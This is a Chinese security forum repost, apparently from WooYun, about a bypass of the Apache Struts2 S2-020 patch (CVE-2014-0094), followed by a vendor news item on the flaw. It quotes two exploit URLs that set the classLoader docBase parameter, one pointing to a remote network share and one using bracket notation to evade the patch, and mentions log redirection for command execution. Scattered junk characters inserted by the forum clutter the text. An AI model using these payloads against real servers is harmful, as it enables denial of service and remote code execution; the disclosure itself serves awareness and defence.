之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用! 5 G$ m* S% o" I) B9 o, j% b. m
! F! N( O% f- r/ U暂时不清楚到底是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat:- http://127.0.0.1/s/example/HelloWorld.action?class.classLoader.resources.dirContext.docBase=//192.168.x.x/test
, B" |! ~. c0 W2 D! Y' V
' i, t, Z8 a0 P P$ D[color=rgb(51, 102, 153) !important]复制代码
0 h* j) A2 R g, P2 _1 X% J6 t( |& e" w2 S
绕过方式是:- http://localhost:8080/Struts2/test.action?class["classLoader"]["resources"]["dirContext"]["docBase"]=xxxxx
! L& I% [- x+ Y4 l $ Y/ E; q0 U9 C' n
[color=rgb(51, 102, 153) !important]复制代码
7 p( O$ u5 P( p# o7 t# p. Y2 T1 }/ x6 a& [$ p- k6 w
顺便说下// netbios协议似乎在仅是windows,linux下貌似不能直接使用这样的协议。之前有发过:[百度安全中心博客-neobyte]Struts2 S2-020在Tomcat 8下的命令执行分析利用切换日志到web目录,有点可行性。 5 o0 `, Z2 Z; F$ h
加速乐发了新闻:
0 X1 w. b& i2 E' Fhttp://jiasule.baidu.com/news/5357a1eebf9efd27e6ecbade/
1 u# R6 P( |- f+ K4月23日消息,近日安全研究人员指出Apache Struts2在漏洞公告S2-020里,在处理修复CVE-2014-0094的漏洞修补方案存在漏洞,导致补丁被完全绕过。目前官方在GitHub上对该问题做出了修正。该问题被曝光后,百度加速乐已率先升级了防御规则,目前百度加速乐可独家防御该漏洞。 7 U, o: b# W/ h$ g* h, X$ M
+ G, J5 r/ ^; j( W& n据了解Struts2已不是第一次出现重大安全事故,去年9月Struts2曝出漏洞,国家多家重要政府网站受到影响,其中不乏部委级网站。此次再次曝出漏洞显现出互联网安全问题的严重性。. N3 P$ g- j6 A+ d8 Y ~
9 b9 Z- u5 b/ w2 E' n0 ~. t7 I4 _" m+ f, o( V% F
( ~! X" W+ _2 @: e8 @4 D( B0 _转载自乌云8 Q' x, B, q- J# B- y& ~, w- ^* j5 T, H
原文链接:http://zone.wooyun.org/content/11876( }/ B8 m: B4 a/ u9 H* U
|